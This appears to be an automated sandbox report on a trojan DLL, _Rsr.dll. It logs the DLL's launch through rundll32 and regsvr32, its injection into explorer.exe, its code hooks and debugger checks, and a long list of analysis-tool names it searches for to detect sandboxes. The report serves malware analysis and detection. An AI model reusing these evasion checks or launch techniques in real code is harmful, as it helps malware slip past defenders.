          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\DsitabeiJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER9462.tmpJump to behavior
          Source: classification engineClassification label: mal84.troj.evad.winDLL@26/5@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AE503 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,2_2_027AE503
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027ABB07 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,2_2_027ABB07
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\_Rsr.dll",#1
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{0CAEAD30-9E4C-4B0F-98B0-C842770E35F5}
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4700:120:WilError_01
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{2893C507-C8CD-408A-991C-4E708D1630B8}
          Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2893C507-C8CD-408A-991C-4E708D1630B8}
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1176
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: _Rsr.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: amstream.pdb source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000012.00000003.398009838.0000000004E61000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000003.397473099.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.399403223.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.397028896.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: _Rsr.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D5089D6 push ecx; ret 0_2_6D5089E9
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BAEB6 push cs; iretd 2_2_027BAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BCB95 push esi; iretd 2_2_027BCB9A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BB066 push ebx; ret 2_2_027BB067
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027BADB4 push cs; iretd 2_2_027BAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D5089D6 push ecx; ret 2_2_6D5089E9
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D505A34 LoadLibraryA,GetProcAddress,0_2_6D505A34
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\_Rsr.dll
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Desktop\_Rsr.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign process
          Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 5128 base: DF380 value: E9 B8 6E DF 02 Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 4892 base: DF380 value: E9 B8 6E EA 02 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5784 base: DF380 value: E9 B8 6E 61 02 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4700 base: DF380 value: E9 B8 6E D4 02 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEL
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEJ
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE0
          Source: explorer.exe, 00000016.00000003.399878898.0000000004B44000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520094595.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598636208.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482336483.0000000004EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
          Source: explorer.exe, 00000016.00000003.400020949.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.400071916.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.399817940.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXER
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEQ
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEM
          Source: explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEO
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEX
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE|
          Source: explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEF
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEE
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXEI
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXEJ
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE[
          Source: explorer.exe, 00000016.00000003.399878898.0000000004B44000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520094595.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598636208.0000000004EBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482336483.0000000004EBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXEY
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE3
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXEQ
          Source: explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE6
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXEY
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE`
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXEF
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXEB
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXEU
          Source: explorer.exe, 00000016.00000003.400020949.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.400071916.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.399817940.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXE6
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
          Source: explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXE0
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE|
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXE3
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEQ
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.400020949.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.400071916.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.399817940.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SYSANALYZER.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEC
          Source: explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEB
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXEO
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXEX
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TCPDUMP.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.400020949.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.400071916.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.399817940.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SNIFF_HIT.EXE
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROC_ANALYZER.EXE
          Source: explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXEY
          Source: explorer.exe, 00000016.00000003.598391575.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598527201.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.647172817.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.598648399.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.520143324.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE6
          Source: explorer.exe, 00000016.00000003.482468930.0000000004B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE`
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1408Thread sleep count: 113 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2360Thread sleep count: 365 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 68Thread sleep count: 288 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2068Thread sleep count: 300 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6080Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2312Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6120Thread sleep time: -57000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-24414
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 365Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeAPI coverage: 7.7 %
          Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027ADE65 GetSystemInfo,2_2_027ADE65
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50D074 FindFirstFileExA,0_2_6D50D074
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_027AC134 FindFirstFileW,FindNextFileW,2_2_027AC134
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50D074 FindFirstFileExA,2_2_6D50D074
          Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-8001
          Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-18852
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50880E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D50880E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D505A34 LoadLibraryA,GetProcAddress,0_2_6D505A34
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D515750 GetProcessHeap,RtlAllocateHeap,0_2_6D515750
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50391B mov eax, dword ptr fs:[00000030h]0_2_6D50391B
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50A626 mov eax, dword ptr fs:[00000030h]0_2_6D50A626
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50391B mov eax, dword ptr fs:[00000030h]2_2_6D50391B
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6D50A626 mov eax, dword ptr fs:[00000030h]2_2_6D50A626
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 656Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50880E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D50880E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D50BCDC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D50BCDC
